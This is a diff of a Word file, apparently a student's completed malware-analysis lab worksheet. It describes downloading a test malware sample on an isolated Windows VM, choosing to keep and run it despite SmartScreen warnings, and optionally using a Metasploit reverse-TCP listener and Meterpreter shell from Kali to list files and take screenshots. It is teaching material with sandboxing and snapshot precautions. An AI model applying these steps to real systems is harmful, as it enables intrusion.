+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>allowing for</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> transfer to exist between the machines, which in this case is over HTTP on port 8000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Navigate to the “malware” folder (while still in your Windows VM</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>), and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> download the test malware. Does it work? If not, why? Document any steps required to enable the download.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When attempting to download the executable on </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> VM, the web browser (edge) alarms us that Microsoft Defender SmartScreen </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>was not able to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scan the executable before downloading. We are given the option to either keep it or delete it, we will choose to keep it. When attempting to launch the executable after downloading it, we are once again warned that SmartScreen is unreachable </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to scan the binary, we choose to run the executable anyways. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Take a snapshot of your VM if your hypervisor has that capability, and if so, please include the screenshot below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2248,18 +3104,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2268,50 +3122,84 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>PASTE SCREENSHOTS HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D5B1E5" wp14:editId="7E1EE5C8">
+            <wp:extent cx="5939155" cy="4453255"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
+            <wp:docPr id="1160572273" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5939155" cy="4453255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2320,38 +3208,37 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2362,19 +3249,19 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
@@ -2382,9 +3269,9 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
@@ -2397,7 +3284,6 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:rPr/>
         <w:t>If you would like to see a sneak preview of the malware in action, you may do so using the following steps:</w:t>
       </w:r>
     </w:p>
@@ -2406,13 +3292,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Verify that you have a current snapshot of your Windows VM and Kali VM.</w:t>
       </w:r>
     </w:p>
@@ -2421,13 +3305,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Verify that your VMs are (only) on the isolated internal network by executing ping commands from a terminal (which should receive no reply from an outside domain such as google.com or 8.8.8.8).</w:t>
       </w:r>
     </w:p>
@@ -2436,22 +3318,29 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Follow the instructions here to initiate a Metasploit session on the Kali machine and set up a reverse-TCP listener in the session: </w:t>
       </w:r>
-      <w:hyperlink r:id="R14684beb27a44496">
+      <w:hyperlink r:id="rId25">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Documentation: Using a Reverse Shell in Metaploit</w:t>
+          <w:t xml:space="preserve">Documentation: Using a Reverse Shell in </w:t>
         </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>Metaploit</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
       </w:hyperlink>
     </w:p>
     <w:p>
@@ -2459,13 +3348,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Run the malware sample on the Windows VM (e.g. by double-clicking its icon).</w:t>
       </w:r>
     </w:p>
@@ -2474,13 +3361,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Observe the establishment of a TCP connection on the Kali machine, and the creation of a “Meterpreter” shell to interact with the malware payload’s reverse TCP connection on the Windows machine.</w:t>
       </w:r>
     </w:p>
@@ -2489,23 +3374,19 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Use the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr/>
         <w:t>meterpreter</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr/>
         <w:t xml:space="preserve"> session as desired to list files, take screenshots, and otherwise verify that the exploit was successful.</w:t>
       </w:r>
     </w:p>
@@ -2514,20 +3395,26 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>When finished, close the sessions on the Kali VM, turn off both VMs, and revert to the snapshots taken before you ran the malware.   (This is always a good practice after running a potential-malware sample, as an unknown code sample may produce side effects in the system of which we’re unaware when we run it.)</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">When finished, close the sessions on the Kali VM, turn off both VMs, and revert to the snapshots taken before you ran the malware.   (This is always </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a good</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> practice after running a potential-malware sample, as an unknown code sample may produce side effects in the system of which we’re unaware when we run it.)</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId23"/>
-      <w:footerReference w:type="default" r:id="rId24"/>
-      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
+      <w:headerReference w:type="default" r:id="rId26"/>
+      <w:footerReference w:type="default" r:id="rId27"/>
+      <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
       <w:cols w:space="720"/>
@@ -2537,7 +3424,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" 